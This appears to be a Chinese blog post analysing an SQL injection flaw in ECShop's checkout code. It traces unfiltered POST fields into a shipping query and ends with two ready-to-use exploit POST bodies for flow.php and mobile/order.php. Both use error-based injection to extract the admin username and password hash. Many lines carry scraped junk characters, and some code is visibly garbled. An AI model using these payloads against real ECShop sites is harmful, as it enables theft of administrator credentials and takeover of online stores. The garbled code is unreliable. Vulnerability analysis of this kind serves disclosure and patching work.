ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。

    漏洞关键文件：

2 D; |$ p1 }5 l6 ?- q9 e    /includes/lib_order.php

    关键函数：

1 q1 J7 L9 T- o  y: A9 m

01     function available_shipping_list($region_id_list)

0 a# \& D3 ]2 P( U0 k' O02 {
: w+ M* K" h% U: L
! R: A- g# \, S3 y, e8 J# e1 Z/ ^$ A03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
$ }3 ?% v4 u* e$ E) c
04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .

9 l7 {1 a2 a# o! R: q, Z8 j05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
# B; \& @7 P' G/ ^. G
  l; O  l8 {2 w4 k& Q06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.
$ b! [. W" \8 T. P
08             'WHERE r.region_id ' . db_create_in($region_id_list) .
! K4 k5 T5 {  C4 O
09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';

10   

11     return $GLOBALS['db']->getAll($sql);
; W! a6 i* E' Q3 T9 G9 @2 Q4 n5 U
3 l4 c0 o/ i* F% z# `12 }
2 Q2 p7 j/ E6 i/ q
! b% r- c9 R# S3 `. o4 j显然对传入的参数没有任何过滤就带入了查询语句。
" [/ A3 W. n( g# S$ D
# K/ a1 |3 X% ~7 N/ E. R下面我们追踪这个函数在flow.php中：
第531行：   

, |4 |2 t- l: E" m" i9 L: ]1 R; F1 $shipping_list     = available_shipping_list($region);



$ ]0 G) x6 f5 E5 P* F! ~0 R- `

( }! |/ O, P3 }7 @! ?再对传入变量进行追踪：
+ r3 _5 }. f2 ?
第530行：   
; o8 n. R" z- f7 X4 i
* w1 d( h- |( N- A1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
6 ]# o5 u( D( c7 N2 }! B


! N! r5 I2 O' }; Q2 p& d
' N1 J" |" K" }0 \% u% T
& g. l  D! t# N  x- E$ U第473行：        
, q# h  `. x8 ?5 V" W4 P- `* s
1 $consignee = get_consignee($_SESSION['user_id']);
* ]2 K% L/ Q: w3 ]1 w7 x! D5 p2 K
到了一个关键函数：

2 [1 R9 p% Z* [1 \% T( ?/includes/lib_order.php

) o# r; O- e- p: }


8 C+ I2 I1 }* ~( L1 Z
01 function get_consignee($user_id)
) _2 f2 `. ]& o
) {* ], p) b: |9 i02 {
5 B7 J1 c0 n- n5 z  q& U& I
03     if (isset($_SESSION['flow_consignee']))

6 z4 A+ e+ O' N) ]( j1 Z04     {
& D# e4 P' M! w0 U
05         /* 如果存在session，则直接返回session中的收货人信息 */

* ~/ n  |1 e+ |( o06   

07         return $_SESSION['flow_consignee'];

) H, S. k* H5 w2 a9 e6 `1 G2 z3 W08     }

' K# [7 e9 d6 k: B: ]# A# `09     else

* f4 Z) Y4 O/ t+ D5 E$ X% q; h10     {

5 c; b- p5 Z3 S  E7 a0 y& o! }2 r11         /* 如果不存在，则取得用户的默认收货人信息 */

12         $arr = array();

1 M: O" y  \0 ^/ |9 O( \; M13   

+ ]) E  g- Q2 d% G; T' V4 N9 A4 `14         if ($user_id > 0)

" i7 e( A* ?+ f, a, c) W6 h2 A15         {
+ E3 k2 G! \# P. ?$ U
16             /* 取默认地址 */

5 L9 o5 E, ~7 {17             $sql = "SELECT ua.*".

18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
  D" {$ P6 K% o9 ~: M) P" m
6 ]: ]3 z, K8 G  g19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
8 B2 V) n: L; E, f" u  f
4 l8 e6 G# W0 I20   
9 {2 `/ x2 J) i! H% k' o: y" @
21             $arr = $GLOBALS['db']->getRow($sql);

9 y) m7 y( U' M4 E) `22         }
8 d$ z/ R8 T8 J# q# \
% Y: V$ D* e: \: p. m/ |* R# V! g23   
9 p. ^( X" d  a: ?" r1 v" H9 v
24         return $arr;

6 i0 l- l/ S' }& i; G25     }

26 }
8 p4 T$ A  ~/ n# c& R
显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？
3 `( Z; t2 e* K4 r9 U


& R& B# v" S$ @2 }1 u; R: j1 g关键点:
( R) Q# p$ @9 M2 C2 m5 r  Q0 G
第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

' n6 N2 @, a1 _! E这里对传入参数反转义存入$_SESSION中。
" Z! t/ ^% }- r# N* y0 r

/ r5 P8 I. s+ b6 ~1 y9 I# }3 [
然后看下：
$ m% C/ ]0 G# W* i" ]


  k' N& v' F0 I  @$ t   
5 F9 p2 O. @0 P6 |: p
3 s0 }6 ~; H  k$ c' f" b% s01 $consignee = array(
, E# }4 N8 S; R  o+ W6 l
02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),
8 C% D0 \2 }' B0 l/ P
) q( I) S1 k0 ^& t6 G03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),
' q# F/ Z+ A/ |% k4 }
% M+ L; n  k& i; g$ S04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
& W# w9 t; T( P& w$ a4 ~
05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

06         'city'          => empty($_POST['city'])       ? '' _POST['city'],
4 I. ~; j1 N) y9 d9 H
% }) p: ~: T; r$ y9 A! U3 x4 j# j07         'district'      => empty($_POST['district'])   ? '' _POST['district'],

08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

9 R* U' K8 Y/ w- M6 P09         'address'       => empty($_POST['address'])    ? '' _POST['address'],
7 u$ q( I; i5 I* t4 y
& Q0 d5 h( d: F- J, d5 q10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),
% \0 I; V! |: A7 i% A# l
* f: m( a2 g; N# b( G: I4 Y11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
6 f* ~" @6 Y. v8 b. ?* }+ D' X
& G3 t3 b& f$ Q4 c. h& E12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
" `: L4 e% @% o4 ]
0 B% z! m. x2 f$ m! G( o0 C# H( X7 Z14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],

15     );

4 s- t# p4 K1 }9 v4 K7 K/ [好了注入就这样出现了。
6 s/ P  X2 Q8 X
==================

注入测试：
4 ^- e$ Y' T3 P2 R
& `& M6 R7 k' M; @5 F; ~# H环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)

8 C0 V, b, R( U  X# K测试程序：ECShop_V2.7.3_UTF8_release1106
. a5 Q' @) Q5 Q5 v

8 j& W+ B  b" c4 H
9 F' Y: I6 G+ _( B( f; t+ d8 ]0 O1.首先需要点击一个商品加入购物车
  \$ i' u- }) N, i" R; @
2.注册一个会员帐号
. m5 i4 c% D% w7 b- B
3.post提交数据


* R" J$ Z0 `2 J4 ]
: V/ V! P$ e% ]5 q- s1 http://127.0.0.1/ecshop/flow.php

2   
; j$ `! a6 S5 L9 s' v! n* @) _# F
3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
/ G0 `" R% w1 g* o' j! e0 a+ ^举一反三，我们根据这个漏洞我们可以继续深入挖掘：
  R. u2 ^7 o1 I
/ {; _; u. Z, p. F, j$ P我们搜寻关键函数function available_shipping_list()

, H, n  P: b6 L' u" n% _在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

+ N6 ?3 r+ F$ d利用exp:
# k1 S  `  W- n" T
1.点击一个商品，点击购买商标
! z. g, B$ E7 s7 z. r: Y
2.登录会员帐号

* B# D; e; x# u" h  V$ Q2 U3.post提交：
1 a2 W7 w7 k" E! A0 y9 t" X
http://127.0.0.1/ecshop/mobile/order.php
8 _- l  C% N3 H
( m- b: b4 p' P: `+ d: `

country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=

* [! x( _/ A  P. |% y. {! c+ U5 ]